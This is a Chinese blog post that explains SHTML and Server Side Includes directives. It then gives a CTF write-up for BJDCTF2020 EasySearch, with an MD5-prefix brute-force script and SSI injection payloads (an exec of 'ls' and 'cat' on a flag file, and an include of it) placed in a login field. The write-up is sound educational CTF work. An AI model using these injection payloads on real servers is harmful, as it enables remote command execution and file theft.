Shtml和SSI学习

文章摘要

Bpple-GPT

Shtml和SSI学习

**SHTML(Server Side Includes HTML)是一种基于HTML的标记语言,用于将服务器端动态内容嵌入到静态HTML页面中。SHTML文件通常以 **.shtml 作为扩展名,而不是常规的 .html。它允许通过服务器端的脚本(如SSI,即服务器端包含)来动态生成或插入内容。

SSI(Server Side Includes,服务器端包含)是一种在Web服务器端动态生成HTML内容的技术。它允许Web页面在被浏览器加载之前,在服务器端插入动态内容。SSI通常用于将静态HTML页面和动态内容结合,使得页面在服务器端动态生成一些内容(例如日期、时间、服务器信息或从其他文件中加载内容)而不需要完全生成动态网页。

示例:

 <!DOCTYPE html>
 <html>
 <head>
     <title>示例 SHTML 页面</title>
 </head>
 <body>
     <h1>欢迎来到我的网页!</h1>
     <!--#include virtual="footer.html" -->
 </body>
 </html>

footer.html 文件的内容会被服务器插入到 <!--#include--> 指令所在的位置。

常用SSI指令

#include

  • 这个指令用于将其他文件的内容嵌入到当前页面中。

  • 例如:

     <!--#include virtual="footer.html" -->
    

    上面的代码会将

     footer.html
    

    文件的内容插入到当前页面中。

#echo

  • 用于输出某个变量的值,比如环境变量、日期、时间等。

  • 例如:

     <!--#echo var="DATE_LOCAL" -->
    

    这会输出服务器的本地时间。

#exec

  • 用来执行外部程序或脚本,并将其输出插入到当前页面。

  • 例如:

     <!--#exec cmd="date" -->
    

    这会在页面中显示服务器的当前日期。

#if / #else / #endif

  • 这些指令用于条件判断,可以根据不同的条件显示不同的内容。
  • 例如:
     <!--#if expr="$QUERY_STRING = 'show=true'" -->
     <p>条件满足,显示内容。</p>
     <!--#else-->
     <p>条件不满足,显示其他内容。</p>
     <!--#endif-->
    

#set

  • 用来定义和设置变量的值,后续可以在页面中使用。
  • 例如:
     <!--#set var="username" value="John Doe" -->
    

题目

[BJDCTF2020]EasySearch

image-20250118144747424

扫描发现存在index.php.swp,一个md5问题

 import hashlib
 
 for i in range(9999999):
     if (hashlib.md5(str(i).encode('utf-8')).hexdigest()[:6] == '6d0bc1'):
         print(i)
         break
 
         #2020666

我们随便登录,抓包发现,可以访问shtml页面,开始我以为是模板注入

学习了之后发现

可以利用SSI执行命令:

 username=<!--#exec cmd="ls /"-->&password=2020666
 username=<!--#exec cmd="ls ../"-->&password=2020666
 username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2 "-->&password=2020666

最后得到flag

也可以利用包含语句

 <!--#include virtual="../flag_990c66bf85a09c664f0b6741840499b2" -->

用键盘敲击出的不只是字符,更是一段段生活的剪影、一个个心底的梦想。希望我的文字能像一束光,在您阅读的瞬间,照亮某个角落,带来一丝温暖与共鸣。

BX33661

站长

不具版权性
不具时效性

文章内容不具时效性。若文章内容有错误之处,请您批评指正。


目录

欢迎来到Bpple的站点,为您导航全站动态

64 文章数
20 分类数
44 评论数
15标签数
最近评论
bpple

bpple


一切顺利

fetain

fetain


good luck

bx

bx


good luck

热门文章

Emoji收集

2024-11-01

542
Hello Halo

2024-10-30

524
本地部署LLM

2024-08-22

505
Uptime Kuma

2024-11-29

499
229

访问统计